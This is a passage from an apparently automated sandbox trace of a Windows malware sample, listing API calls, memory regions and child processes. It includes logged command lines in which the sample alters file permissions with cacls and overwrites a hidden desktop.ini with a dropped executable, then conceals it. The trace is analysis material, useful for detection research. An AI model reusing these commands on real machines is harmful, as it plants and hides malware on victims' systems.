lpString2="\\XCOPY.EXE") returned -1 [0126.643] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22f41c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f468 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"", lpProcessInformation=0x22f468*(hProcess=0x4c, hThread=0x50, dwProcessId=0xfb8, dwThreadId=0xfbc)) returned 1 [0126.652] CloseHandle (hObject=0x50) returned 1 [0126.652] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0126.652] GetEnvironmentStringsW () returned 0x3622f8* [0126.653] FreeEnvironmentStringsW (penv=0x3622f8) returned 1 [0126.653] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0126.835] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x22f35c | out: lpExitCode=0x22f35c*=0x0) returned 1 [0126.835] CloseHandle (hObject=0x4c) returned 1 [0126.835] _vsnwprintf (in: _Buffer=0x22f4a4, _BufferCount=0x13, _Format="%08X", _ArgList=0x22f368 | out: _Buffer="00000000") returned 8 [0126.835] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0126.835] GetEnvironmentStringsW () returned 0x3622f8* [0126.835] FreeEnvironmentStringsW (penv=0x3622f8) returned 1 [0126.835] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0126.835] GetEnvironmentStringsW () returned 0x3622f8* [0126.835] FreeEnvironmentStringsW (penv=0x3622f8) returned 1 [0126.835] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f3c0 | out: lpAttributeList=0x22f3c0) [0126.835] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.835] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.835] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.836] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.836] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.836] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.836] SetConsoleInputExeNameW () returned 0x1 [0126.836] GetConsoleOutputCP () returned 0x1b5 [0126.836] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.836] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.836] exit (_Code=0) Process: id = "73" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16920" os_pid = "0xfac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "72" os_parent_pid = "0xf90" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9906 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9907 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9908 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9909 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 9910 start_va = 0x3e0000 end_va = 0x3e8fff entry_point = 0x3e0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 9911 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9912 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9913 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9914 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 9915 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9916 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9917 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9918 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 9919 start_va = 0xe0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 9920 start_va = 0x1e0000 end_va = 0x246fff entry_point = 0x1e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9921 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9922 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9923 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9924 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9925 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9926 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9927 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 129 os_tid = 0xfb0 Thread: id = 130 os_tid = 0xfb4 Process: id = "74" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea168a0" os_pid = "0xfb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "72" os_parent_pid = "0xf90" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9930 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9931 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9932 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9933 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 9934 start_va = 0x2c0000 end_va = 0x2c6fff entry_point = 0x2c0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 9935 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9936 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9937 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9938 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 9939 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9940 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9941 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9942 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9943 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 9944 start_va = 0x770000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 9945 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 9946 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9947 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9948 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 9949 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9950 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9951 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9952 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9953 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 9954 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9955 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9956 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 9957 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 9958 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9959 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 131 os_tid = 0xfbc Process: id = "75" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16900" os_pid = "0xfcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10086 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10087 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10088 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10089 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 10090 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10091 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10092 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10093 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10094 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 10095 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10120 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10121 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10122 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10123 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 10124 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 10125 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 10126 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10127 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10128 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10129 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10130 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10131 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10132 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10133 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10134 start_va = 0x460000 end_va = 0x527fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10135 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10136 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10137 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 10138 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 10139 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 10140 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 10141 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10142 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 10143 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Region: id = 10144 start_va = 0x13b0000 end_va = 0x167efff entry_point = 0x13b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 133 os_tid = 0xfd0 [0127.109] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f834 | out: lpSystemTimeAsFileTime=0x18f834*(dwLowDateTime=0x85b279c0, dwHighDateTime=0x1d440a9)) [0127.109] GetCurrentProcessId () returned 0xfcc [0127.109] GetCurrentThreadId () returned 0xfd0 [0127.109] GetTickCount () returned 0x28d6f [0127.109] QueryPerformanceCounter (in: lpPerformanceCount=0x18f82c | out: lpPerformanceCount=0x18f82c*=18389836402) returned 1 [0127.110] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0127.110] __set_app_type (_Type=0x1) [0127.110] __p__fmode () returned 0x76b331f4 [0127.110] __p__commode () returned 0x76b331fc [0127.110] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0127.111] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0127.111] GetCurrentThreadId () returned 0xfd0 [0127.111] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfd0) returned 0x38 [0127.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.111] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0127.111] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.112] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.112] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f7c4 | out: phkResult=0x18f7c4*=0x0) returned 0x2 [0127.112] VirtualQuery (in: lpAddress=0x18f7fb, lpBuffer=0x18f794, dwLength=0x1c | out: lpBuffer=0x18f794*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.112] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f794, dwLength=0x1c | out: lpBuffer=0x18f794*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0127.112] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f794, dwLength=0x1c | out: lpBuffer=0x18f794*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0127.112] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f794, dwLength=0x1c | out: lpBuffer=0x18f794*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.112] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f794, dwLength=0x1c | out: lpBuffer=0x18f794*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0127.112] GetConsoleOutputCP () returned 0x1b5 [0127.112] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.112] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0127.112] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.112] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0127.112] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.112] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.113] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.113] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.113] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.113] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.113] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.113] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0127.113] GetEnvironmentStringsW () returned 0x3704e8* [0127.113] FreeEnvironmentStringsW (penv=0x3704e8) returned 1 [0127.114] GetEnvironmentStringsW () returned 0x3704e8* [0127.114] FreeEnvironmentStringsW (penv=0x3704e8) returned 1 [0127.114] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e734 | out: phkResult=0x18e734*=0x40) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x0, lpData=0x18e740*=0x98, lpcbData=0x18e738*=0x1000) returned 0x2 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x4, lpData=0x18e740*=0x1, lpcbData=0x18e738*=0x4) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x0, lpData=0x18e740*=0x1, lpcbData=0x18e738*=0x1000) returned 0x2 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x4, lpData=0x18e740*=0x0, lpcbData=0x18e738*=0x4) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x4, lpData=0x18e740*=0x40, lpcbData=0x18e738*=0x4) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x4, lpData=0x18e740*=0x40, lpcbData=0x18e738*=0x4) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x0, lpData=0x18e740*=0x40, 